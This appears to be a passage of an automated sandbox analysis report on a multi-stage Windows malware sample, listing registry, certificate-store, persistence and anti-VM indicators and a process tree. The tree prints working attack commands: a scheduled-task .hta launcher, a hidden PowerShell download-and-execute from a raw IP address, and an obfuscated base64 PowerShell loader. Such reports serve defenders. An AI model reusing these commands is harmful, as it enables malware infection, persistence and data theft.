\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e6701df100.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7IIl2eE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language e6701df100.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rm3cVPI.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Passwords.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1b48d113ab.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 2648 timeout.exe 3416 timeout.exe -
Kills process with taskkill 5 IoCs
pid Process 2444 taskkill.exe 1616 taskkill.exe 3032 taskkill.exe 2788 taskkill.exe 2348 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_Classes\Local Settings firefox.exe -
Modifies system certificate store 2 TTPs 4 IoCs
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e futors.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e futors.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 futors.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e futors.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3000 schtasks.exe 2408 schtasks.exe 3688 schtasks.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2916 22.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2228 powershell.exe 2228 powershell.exe 2228 powershell.exe 2856 TempGW383Q5QNGDZCNJBRGPANPUOUTCDUXCC.EXE 1776 rapes.exe 2992 Rm3cVPI.exe 2992 Rm3cVPI.exe 2992 Rm3cVPI.exe 2992 Rm3cVPI.exe 2696 b422135428.exe 1620 powershell.exe 2760 4134bcbcf6.exe 2156 3e23f0d1f6.exe 2760 4134bcbcf6.exe 2760 4134bcbcf6.exe 2760 4134bcbcf6.exe 2760 4134bcbcf6.exe 2204 Bell_Setup16.tmp 2204 Bell_Setup16.tmp 2156 3e23f0d1f6.exe 2156 3e23f0d1f6.exe 2156 3e23f0d1f6.exe 2156 3e23f0d1f6.exe 1796 f1b96dde78.exe 984 e6701df100.exe 984 e6701df100.exe 984 e6701df100.exe 3408 63685cf865.exe 3408 63685cf865.exe 3408 63685cf865.exe 3408 63685cf865.exe 3620 21572c0b2a.exe 3620 21572c0b2a.exe 3932 59ee8e938d.exe 3932 59ee8e938d.exe 3260 fb26e2dee5.exe 3260 fb26e2dee5.exe 3760 ecdc428e8a.exe 3760 ecdc428e8a.exe 3292 powershell.exe 3856 Rm3cVPI.exe 3856 Rm3cVPI.exe 3856 Rm3cVPI.exe 3856 Rm3cVPI.exe 2588 Passwords.com 2588 Passwords.com 2588 Passwords.com 2588 Passwords.com 2588 Passwords.com 2588 Passwords.com 3044 93fb3e09f2.exe 3044 93fb3e09f2.exe 3044 93fb3e09f2.exe 2588 Passwords.com 2588 Passwords.com 2588 Passwords.com 2588 Passwords.com 2708 powershell.exe 2708 powershell.exe 2708 powershell.exe 2708 powershell.exe 3868 TempZ3M2RN3EQL2RSXBMV2NGCEGXBJKOHZCM.EXE 3868 TempZ3M2RN3EQL2RSXBMV2NGCEGXBJKOHZCM.EXE 4056 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 476 Process not Found 476 Process not Found -
Suspicious use of AdjustPrivilegeToken 18 IoCs
description pid Process Token: SeDebugPrivilege 2228 powershell.exe Token: SeDebugPrivilege 1620 powershell.exe Token: SeDebugPrivilege 2348 taskkill.exe Token: SeDebugPrivilege 2444 taskkill.exe Token: SeDebugPrivilege 1616 taskkill.exe Token: SeDebugPrivilege 3032 taskkill.exe Token: SeDebugPrivilege 2788 taskkill.exe Token: SeDebugPrivilege 1516 firefox.exe Token: SeDebugPrivilege 1516 firefox.exe Token: SeDebugPrivilege 3408 63685cf865.exe Token: SeDebugPrivilege 3292 powershell.exe Token: SeDebugPrivilege 3776 tasklist.exe Token: SeDebugPrivilege 3800 tasklist.exe Token: SeDebugPrivilege 2708 powershell.exe Token: SeDebugPrivilege 4056 powershell.exe Token: SeDebugPrivilege 3668 powershell.exe Token: SeDebugPrivilege 3520 powershell.exe Token: SeDebugPrivilege 3604 powershell.exe -
Suspicious use of FindShellTrayWindow 26 IoCs
pid Process 1240 2025-03-29_3563a8e325a1094e42df3e36be30699b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 1240 2025-03-29_3563a8e325a1094e42df3e36be30699b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 1240 2025-03-29_3563a8e325a1094e42df3e36be30699b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2856 TempGW383Q5QNGDZCNJBRGPANPUOUTCDUXCC.EXE 1532 amnew.exe 2204 Bell_Setup16.tmp 984 e6701df100.exe 984 e6701df100.exe 984 e6701df100.exe 984 e6701df100.exe 984 e6701df100.exe 984 e6701df100.exe 1516 firefox.exe 1516 firefox.exe 1516 firefox.exe 1516 firefox.exe 984 e6701df100.exe 984 e6701df100.exe 984 e6701df100.exe 984 e6701df100.exe 2588 Passwords.com 2588 Passwords.com 2588 Passwords.com 3668 1b48d113ab.exe 3668 1b48d113ab.exe 3668 1b48d113ab.exe -
Suspicious use of SendNotifyMessage 22 IoCs
pid Process 1240 2025-03-29_3563a8e325a1094e42df3e36be30699b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 1240 2025-03-29_3563a8e325a1094e42df3e36be30699b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 1240 2025-03-29_3563a8e325a1094e42df3e36be30699b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 984 e6701df100.exe 984 e6701df100.exe 984 e6701df100.exe 984 e6701df100.exe 984 e6701df100.exe 984 e6701df100.exe 1516 firefox.exe 1516 firefox.exe 1516 firefox.exe 984 e6701df100.exe 984 e6701df100.exe 984 e6701df100.exe 984 e6701df100.exe 2588 Passwords.com 2588 Passwords.com 2588 Passwords.com 3668 1b48d113ab.exe 3668 1b48d113ab.exe 3668 1b48d113ab.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1240 wrote to memory of 288 1240 2025-03-29_3563a8e325a1094e42df3e36be30699b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 30 PID 1240 wrote to memory of 288 1240 2025-03-29_3563a8e325a1094e42df3e36be30699b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 30 PID 1240 wrote to memory of 288 1240 2025-03-29_3563a8e325a1094e42df3e36be30699b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 30 PID 1240 wrote to memory of 288 1240 2025-03-29_3563a8e325a1094e42df3e36be30699b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 30 PID 1240 wrote to memory of 2968 1240 2025-03-29_3563a8e325a1094e42df3e36be30699b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 31 PID 1240 wrote to memory of 2968 1240 2025-03-29_3563a8e325a1094e42df3e36be30699b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 31 PID 1240 wrote to memory of 2968 1240 2025-03-29_3563a8e325a1094e42df3e36be30699b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 31 PID 1240 wrote to memory of 2968 1240 2025-03-29_3563a8e325a1094e42df3e36be30699b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 31 PID 288 wrote to memory of 3000 288 cmd.exe 33 PID 288 wrote to memory of 3000 288 cmd.exe 33 PID 288 wrote to memory of 3000 288 cmd.exe 33 PID 288 wrote to memory of 3000 288 cmd.exe 33 PID 2968 wrote to memory of 2228 2968 mshta.exe 34 PID 2968 wrote to memory of 2228 2968 mshta.exe 34 PID 2968 wrote to memory of 2228 2968 mshta.exe 34 PID 2968 wrote to memory of 2228 2968 mshta.exe 34 PID 2228 wrote to memory of 2856 2228 powershell.exe 37 PID 2228 wrote to memory of 2856 2228 powershell.exe 37 PID 2228 wrote to memory of 2856 2228 powershell.exe 37 PID 2228 wrote to memory of 2856 2228 powershell.exe 37 PID 2856 wrote to memory of 1776 2856 TempGW383Q5QNGDZCNJBRGPANPUOUTCDUXCC.EXE 38 PID 2856 wrote to memory of 1776 2856 TempGW383Q5QNGDZCNJBRGPANPUOUTCDUXCC.EXE 38 PID 2856 wrote to memory of 1776 2856 TempGW383Q5QNGDZCNJBRGPANPUOUTCDUXCC.EXE 38 PID 2856 wrote to memory of 1776 2856 TempGW383Q5QNGDZCNJBRGPANPUOUTCDUXCC.EXE 38 PID 1776 wrote to memory of 2992 1776 rapes.exe 40 PID 1776 wrote to memory of 2992 1776 rapes.exe 40 PID 1776 wrote to memory of 2992 1776 rapes.exe 40 PID 1776 wrote to memory of 2992 1776 rapes.exe 40 PID 1776 wrote to memory of 2696 1776 rapes.exe 42 PID 1776 wrote to memory of 2696 1776 rapes.exe 42 PID 1776 wrote to memory of 2696 1776 rapes.exe 42 PID 1776 wrote to memory of 2696 1776 rapes.exe 42 PID 1776 wrote to memory of 1756 1776 rapes.exe 43 PID 1776 wrote to memory of 1756 1776 rapes.exe 43 PID 1776 wrote to memory of 1756 1776 rapes.exe 43 PID 1776 wrote to memory of 1756 1776 rapes.exe 43 PID 1756 wrote to memory of 2296 1756 cmd.exe 45 PID 1756 wrote to memory of 2296 1756 cmd.exe 45 PID 1756 wrote to memory of 2296 1756 cmd.exe 45 PID 1756 wrote to memory of 2296 1756 cmd.exe 45 PID 2296 wrote to memory of 1620 2296 cmd.exe 47 PID 2296 wrote to memory of 1620 2296 cmd.exe 47 PID 2296 wrote to memory of 1620 2296 cmd.exe 47 PID 2296 wrote to memory of 1620 2296 cmd.exe 47 PID 1776 wrote to memory of 1532 1776 rapes.exe 48 PID 1776 wrote to memory of 1532 1776 rapes.exe 48 PID 1776 wrote to memory of 1532 1776 rapes.exe 48 PID 1776 wrote to memory of 1532 1776 rapes.exe 48 PID 1532 wrote to memory of 2448 1532 amnew.exe 49 PID 1532 wrote to memory of 2448 1532 amnew.exe 49 PID 1532 wrote to memory of 2448 1532 amnew.exe 49 PID 1532 wrote to memory of 2448 1532 amnew.exe 49 PID 1776 wrote to memory of 2780 1776 rapes.exe 50 PID 1776 wrote to memory of 2780 1776 rapes.exe 50 PID 1776 wrote to memory of 2780 1776 rapes.exe 50 PID 1776 wrote to memory of 2780 1776 rapes.exe 50 PID 2780 wrote to memory of 2816 2780 apple.exe 51 PID 2780 wrote to memory of 2816 2780 apple.exe 51 PID 2780 wrote to memory of 2816 2780 apple.exe 51 PID 2780 wrote to memory of 2816 2780 apple.exe 51 PID 2816 wrote to memory of 2456 2816 22.exe 52 PID 2816 wrote to memory of 2456 2816 22.exe 52 PID 2816 wrote to memory of 2456 2816 22.exe 52 PID 2816 wrote to memory of 2456 2816 22.exe 52 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-03-29_3563a8e325a1094e42df3e36be30699b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-03-29_3563a8e325a1094e42df3e36be30699b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1240 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn YQoqlmaio0f /tr "mshta C:\Users\Admin\AppData\Local\Temp\QRWeS8fIr.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:288 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn YQoqlmaio0f /tr "mshta C:\Users\Admin\AppData\Local\Temp\QRWeS8fIr.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3000
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\QRWeS8fIr.hta2⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2968 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GW383Q5QNGDZCNJBRGPANPUOUTCDUXCC.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2228 -
C:\Users\Admin\AppData\Local\TempGW383Q5QNGDZCNJBRGPANPUOUTCDUXCC.EXE"C:\Users\Admin\AppData\Local\TempGW383Q5QNGDZCNJBRGPANPUOUTCDUXCC.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2856 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1776 -
C:\Users\Admin\AppData\Local\Temp\10358260101\Rm3cVPI.exe"C:\Users\Admin\AppData\Local\Temp\10358260101\Rm3cVPI.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2992
-
-
C:\Users\Admin\AppData\Local\Temp\10362200101\b422135428.exe"C:\Users\Admin\AppData\Local\Temp\10362200101\b422135428.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2696
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10364621121\2GF9eeb.cmd"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1756 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10364621121\2GF9eeb.cmd"7⤵
- Suspicious use of WriteProcessMemory
PID:2296 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueG